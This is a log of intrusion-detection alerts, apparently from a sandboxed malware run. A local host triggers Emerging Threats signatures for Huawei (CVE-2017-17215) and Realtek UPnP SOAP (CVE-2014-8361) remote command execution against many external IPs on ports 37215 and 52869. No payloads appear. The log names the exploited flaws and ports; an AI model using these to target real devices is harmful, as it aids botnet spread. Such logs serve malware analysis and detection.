                                      07/20/24-23:01:24.929013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484237215192.168.2.2372.254.44.143
                                      07/20/24-23:01:46.444461TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615818052869192.168.2.23170.132.161.86
                                      07/20/24-23:01:08.615260TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24654652869192.168.2.23109.115.27.6
                                      07/20/24-23:02:02.439009TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5673852869192.168.2.2392.202.152.200
                                      07/20/24-23:01:24.882291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465637215192.168.2.23157.30.21.28
                                      07/20/24-23:01:43.047922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6002252869192.168.2.2398.94.65.60
                                      07/20/24-23:01:48.576250TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614157652869192.168.2.23203.57.14.26
                                      07/20/24-23:01:02.048367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191837215192.168.2.23157.239.203.194
                                      07/20/24-23:02:16.745304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3284052869192.168.2.23129.246.142.35
                                      07/20/24-23:01:42.660847TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4008452869192.168.2.2379.42.102.158
                                      07/20/24-23:01:50.169961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4339452869192.168.2.2354.182.169.174
                                      07/20/24-23:01:34.048825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4103037215192.168.2.23197.144.161.152
                                      07/20/24-23:01:44.158709TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23361852869192.168.2.231.26.245.187
                                      07/20/24-23:01:44.026968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23678252869192.168.2.2389.86.226.219
                                      07/20/24-23:01:24.444696TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4864452869192.168.2.23114.247.247.18
                                      07/20/24-23:01:42.706162TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614904052869192.168.2.23105.187.39.89
                                      07/20/24-23:01:24.929013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433637215192.168.2.23158.210.184.146
                                      07/20/24-23:01:04.118165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3738437215192.168.2.23157.86.217.223
                                      07/20/24-23:01:46.913205TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4707052869192.168.2.2342.208.30.144
                                      07/20/24-23:02:00.570605TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4524052869192.168.2.2344.143.79.165
                                      07/20/24-23:01:07.016889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5464437215192.168.2.23157.211.80.133
                                      07/20/24-23:01:45.432263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3410652869192.168.2.23134.101.23.241
                                      07/20/24-23:01:40.285038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4180037215192.168.2.23160.135.194.107
                                      07/20/24-23:01:46.877606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3474652869192.168.2.2397.235.141.174
                                      07/20/24-23:01:53.427882TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3734252869192.168.2.23190.13.238.183
                                      07/20/24-23:01:08.691384TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23721252869192.168.2.23155.161.137.123
                                      07/20/24-23:01:56.353592TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614921652869192.168.2.23124.34.247.33
                                      07/20/24-23:01:31.312736TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24918652869192.168.2.23166.142.205.252
                                      07/20/24-23:02:14.686790TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614043652869192.168.2.23211.214.194.53
                                      07/20/24-23:01:27.658221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495837215192.168.2.23197.127.76.103
                                      07/20/24-23:02:08.319876TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614558052869192.168.2.2372.122.103.48
                                      07/20/24-23:01:08.595072TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25290052869192.168.2.23152.136.236.137
                                      07/20/24-23:01:42.790558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4772052869192.168.2.23112.201.119.160
                                      07/20/24-23:01:40.310207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331037215192.168.2.23197.17.28.211
                                      07/20/24-23:01:08.655109TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24087852869192.168.2.23205.29.56.156
                                      07/20/24-23:01:51.067695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3864852869192.168.2.2318.233.238.80
                                      07/20/24-23:02:10.113046TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4723252869192.168.2.2349.65.211.106
                                      07/20/24-23:01:41.260371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614730452869192.168.2.2375.161.254.133
                                      07/20/24-23:01:51.290014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4112452869192.168.2.2374.243.121.184
                                      07/20/24-23:01:43.158919TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615298452869192.168.2.23105.83.227.139
                                      07/20/24-23:01:50.280308TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3741052869192.168.2.2391.203.103.36
                                      07/20/24-23:01:47.141323TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25131652869192.168.2.23139.92.32.15
                                      07/20/24-23:01:53.175676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4231252869192.168.2.23125.58.232.126
                                      07/20/24-23:01:47.663629TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613698252869192.168.2.23148.112.106.138
                                      07/20/24-23:01:34.043842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162037215192.168.2.23197.168.204.140
                                      07/20/24-23:01:04.082384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259837215192.168.2.23157.189.59.211
                                      07/20/24-23:01:20.152427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403437215192.168.2.23197.250.222.179
                                      07/20/24-23:01:42.501090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3597052869192.168.2.2318.13.209.238
                                      07/20/24-23:02:14.650164TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613572852869192.168.2.23159.226.32.12
                                      07/20/24-23:01:08.597662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5053652869192.168.2.2398.176.193.82
                                      07/20/24-23:01:20.119973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5329237215192.168.2.23157.0.250.177
                                      07/20/24-23:01:54.880741TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615223852869192.168.2.23167.225.20.24
                                      07/20/24-23:01:40.331150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690437215192.168.2.23197.185.185.234
                                      07/20/24-23:01:43.239928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614632252869192.168.2.2357.189.118.114
                                      07/20/24-23:00:59.153608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302837215192.168.2.23197.218.184.30
                                      07/20/24-23:01:27.664887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826037215192.168.2.23197.148.184.251
                                      07/20/24-23:02:11.630112TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5067452869192.168.2.23142.204.114.80
                                      07/20/24-23:01:42.486621TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3315652869192.168.2.2352.64.207.91
                                      07/20/24-23:01:54.796749TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3715852869192.168.2.23180.65.88.44
                                      07/20/24-23:01:41.217142TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3312052869192.168.2.231.26.245.187
                                      07/20/24-23:01:00.641498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956437215192.168.2.23157.198.81.69
                                      07/20/24-23:01:41.496780TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614922452869192.168.2.2359.110.210.1
                                      07/20/24-23:01:42.687128TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23825452869192.168.2.2369.23.248.153
                                      07/20/24-23:01:27.655551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700637215192.168.2.2336.6.60.249
                                      07/20/24-23:02:10.069241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3728452869192.168.2.23152.191.160.62
                                      07/20/24-23:01:08.614193TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4008652869192.168.2.23162.220.3.30
                                      07/20/24-23:01:27.649697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851637215192.168.2.23197.163.104.51
                                      07/20/24-23:01:10.675827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614085452869192.168.2.23217.106.167.57
                                      07/20/24-23:01:45.610865TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23546652869192.168.2.23148.216.25.247
                                      07/20/24-23:01:47.808098TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613412052869192.168.2.2357.119.169.7
                                      07/20/24-23:01:47.873078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5195252869192.168.2.2393.25.182.143
                                      07/20/24-23:01:34.053061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3691037215192.168.2.23134.205.144.234
                                      07/20/24-23:01:14.111381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317237215192.168.2.2341.25.113.161
                                      07/20/24-23:01:43.203681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4271452869192.168.2.23207.223.163.108
                                      07/20/24-23:01:43.855231TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614229652869192.168.2.23203.94.134.229
                                      07/20/24-23:01:24.876750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4566637215192.168.2.23157.217.202.87
                                      07/20/24-23:01:25.342792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5865852869192.168.2.23154.90.91.204
                                      07/20/24-23:01:31.321189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4879052869192.168.2.23157.217.190.133
                                      07/20/24-23:01:46.261793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5398852869192.168.2.23162.205.235.41
                                      07/20/24-23:01:08.620788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3926652869192.168.2.23185.31.200.232
                                      07/20/24-23:01:07.026812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5760637215192.168.2.2362.96.8.174
                                      07/20/24-23:01:43.938688TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613709452869192.168.2.23183.223.8.125
                                      07/20/24-23:01:02.144931TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615169652869192.168.2.23143.254.34.7
                                      07/20/24-23:01:48.970191TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3412652869192.168.2.23210.32.95.217
                                      07/20/24-23:01:08.619597TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3426652869192.168.2.2340.55.203.85
                                      07/20/24-23:02:02.537098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5469052869192.168.2.23113.102.84.222
                                      07/20/24-23:01:02.139489TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615226452869192.168.2.2337.205.238.167
                                      07/20/24-23:01:07.066373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4049437215192.168.2.23197.12.103.165
                                      07/20/24-23:01:46.225146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3668852869192.168.2.2343.224.149.155
                                      07/20/24-23:01:04.050503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6085037215192.168.2.23197.232.225.145
                                      07/20/24-23:01:42.631864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4737252869192.168.2.23191.177.238.243
                                      07/20/24-23:00:59.157444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901037215192.168.2.23157.24.24.246
                                      07/20/24-23:01:42.104533TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25184452869192.168.2.2368.175.73.118
                                      07/20/24-23:01:42.944341TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5542652869192.168.2.23201.86.102.204
                                      07/20/24-23:01:42.966322TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615125252869192.168.2.2385.144.205.165
                                      07/20/24-23:00:57.220999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109437215192.168.2.23157.66.238.102
                                      07/20/24-23:00:59.172943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966237215192.168.2.23216.40.91.1
                                      07/20/24-23:01:11.636599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927037215192.168.2.2313.40.75.19
                                      07/20/24-23:01:44.469580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5895652869192.168.2.2357.145.129.242
                                      07/20/24-23:01:52.582295TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23555252869192.168.2.2381.110.138.235
                                      07/20/24-23:01:24.910426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308437215192.168.2.23197.178.69.12
                                      07/20/24-23:01:41.383466TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3513052869192.168.2.23193.15.215.48
                                      07/20/24-23:01:51.968363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3725652869192.168.2.23140.201.238.135
                                      07/20/24-23:01:02.059312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070837215192.168.2.23197.29.108.54
                                      07/20/24-23:01:43.030153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4060452869192.168.2.23101.157.175.20
                                      07/20/24-23:01:04.977217TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615980052869192.168.2.23164.251.43.137
                                      07/20/24-23:01:43.965131TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23459452869192.168.2.23217.141.116.135
                                      07/20/24-23:01:20.152427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181037215192.168.2.23170.150.191.157
                                      07/20/24-23:01:41.567823TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25321252869192.168.2.2354.140.169.156
                                      07/20/24-23:01:53.675171TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5309652869192.168.2.23196.92.88.25
                                      07/20/24-23:01:31.976984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942237215192.168.2.23197.243.29.19
                                      07/20/24-23:00:57.221790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680837215192.168.2.23197.138.137.217
                                      07/20/24-23:01:41.156801TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614484652869192.168.2.23216.159.149.17
                                      07/20/24-23:01:20.161614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058037215192.168.2.23157.5.129.59
                                      07/20/24-23:01:34.050672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953237215192.168.2.2341.141.197.116
                                      07/20/24-23:01:44.520226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615262052869192.168.2.2388.161.89.160
                                      07/20/24-23:01:02.064358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440237215192.168.2.23157.219.128.2
                                      07/20/24-23:01:08.667513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3713252869192.168.2.23134.167.171.74
                                      07/20/24-23:01:34.044223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013837215192.168.2.2341.19.208.214
                                      07/20/24-23:00:57.221220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706837215192.168.2.23197.30.15.103
                                      07/20/24-23:01:00.638418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842437215192.168.2.2341.90.83.142
                                      07/20/24-23:01:47.856443TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24120452869192.168.2.2325.194.48.207
                                      07/20/24-23:01:21.936545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360437215192.168.2.2341.20.166.185
                                      07/20/24-23:01:24.715800TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615586852869192.168.2.23188.173.105.15
                                      07/20/24-23:01:25.656173TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614736852869192.168.2.23177.181.36.106
                                      07/20/24-23:01:31.312234TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24783252869192.168.2.2377.157.20.139
                                      07/20/24-23:01:47.042994TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24970852869192.168.2.23107.137.22.219
                                      07/20/24-23:01:49.553792TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23507452869192.168.2.2368.106.199.227
                                      07/20/24-23:00:59.185032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574837215192.168.2.23197.112.222.157
                                      07/20/24-23:01:01.415907TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615727052869192.168.2.2341.215.81.142
                                      07/20/24-23:01:40.334934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578037215192.168.2.23157.69.245.123
                                      07/20/24-23:01:45.048479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5603452869192.168.2.23124.24.223.164
                                      07/20/24-23:01:42.588824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613777852869192.168.2.2369.23.248.153
                                      07/20/24-23:00:59.158278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3326237215192.168.2.2341.232.172.92
                                      07/20/24-23:01:32.028836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549237215192.168.2.23186.54.113.175
                                      07/20/24-23:01:08.677189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5905652869192.168.2.235.53.123.92
                                      07/20/24-23:01:12.806235TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24015052869192.168.2.23119.4.44.94
                                      07/20/24-23:01:31.318206TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25966652869192.168.2.23154.90.91.204
                                      07/20/24-23:01:42.651912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4720052869192.168.2.23209.170.78.160
                                      07/20/24-23:02:07.552669TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615426052869192.168.2.2323.130.194.51
                                      07/20/24-23:01:43.751196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24717852869192.168.2.23147.72.210.150
                                      07/20/24-23:01:48.433265TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615524452869192.168.2.23153.55.136.220
                                      07/20/24-23:01:48.958887TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23662452869192.168.2.2395.200.159.137
                                      07/20/24-23:02:10.141900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24866252869192.168.2.23168.32.23.40
                                      07/20/24-23:01:42.290838TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613751052869192.168.2.2349.182.174.70
                                      07/20/24-23:01:45.458332TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613549052869192.168.2.23147.65.114.30
                                      07/20/24-23:02:04.942554TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3878052869192.168.2.2370.135.187.127
                                      07/20/24-23:01:42.653654TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616036452869192.168.2.2385.15.162.89
                                      07/20/24-23:01:31.975513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4020637215192.168.2.23197.92.153.21
                                      07/20/24-23:01:58.961047TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615511852869192.168.2.23161.100.49.199
                                      07/20/24-23:01:42.508021TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25075852869192.168.2.23186.5.70.201
                                      07/20/24-23:01:20.161614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5730437215192.168.2.23157.58.211.164
                                      07/20/24-23:01:46.512162TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614897252869192.168.2.2347.135.155.164
                                      07/20/24-23:01:31.975107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016237215192.168.2.2341.66.153.204
                                      07/20/24-23:01:42.571884TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616049852869192.168.2.2318.151.187.19
                                      07/20/24-23:01:52.019773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4773452869192.168.2.23189.86.15.141
                                      07/20/24-23:01:48.811098TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23839052869192.168.2.2364.225.111.147
                                      07/20/24-23:01:07.036064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564437215192.168.2.2344.107.36.53
                                      07/20/24-23:01:42.656962TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4299852869192.168.2.2319.15.33.52
                                      07/20/24-23:01:55.572517TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24119652869192.168.2.23169.122.121.121
                                      07/20/24-23:00:59.168569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748837215192.168.2.23157.234.59.179
                                      07/20/24-23:01:34.071062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505637215192.168.2.23164.27.106.147
                                      07/20/24-23:01:03.416441TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614831052869192.168.2.2312.208.124.228
                                      07/20/24-23:01:47.663629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5212852869192.168.2.2361.27.196.68
                                      07/20/24-23:01:42.452119TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4028652869192.168.2.23213.180.197.99
                                      07/20/24-23:02:00.198960TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25108052869192.168.2.23212.62.106.68
                                      07/20/24-23:01:47.891992TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5678252869192.168.2.2398.158.142.52
                                      07/20/24-23:01:07.062666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844637215192.168.2.23197.129.190.37
                                      07/20/24-23:01:10.684338TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615470252869192.168.2.23190.111.169.67
                                      07/20/24-23:01:45.407049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3545052869192.168.2.2391.148.233.46
                                      07/20/24-23:01:43.260197TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613782652869192.168.2.23207.203.170.191
                                      07/20/24-23:01:52.838688TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25280652869192.168.2.2323.8.251.245
                                      07/20/24-23:01:07.114267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5512637215192.168.2.23157.54.178.208
                                      07/20/24-23:01:27.725851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085437215192.168.2.2341.140.237.44
                                      07/20/24-23:01:49.469876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4976852869192.168.2.23116.148.59.65
                                      07/20/24-23:01:42.178390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4224852869192.168.2.2351.186.28.39
                                      07/20/24-23:01:52.089079TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615965252869192.168.2.2335.179.67.131
                                      07/20/24-23:01:53.308763TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25256252869192.168.2.2317.116.47.253
                                      07/20/24-23:01:02.076414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472837215192.168.2.2341.232.178.1
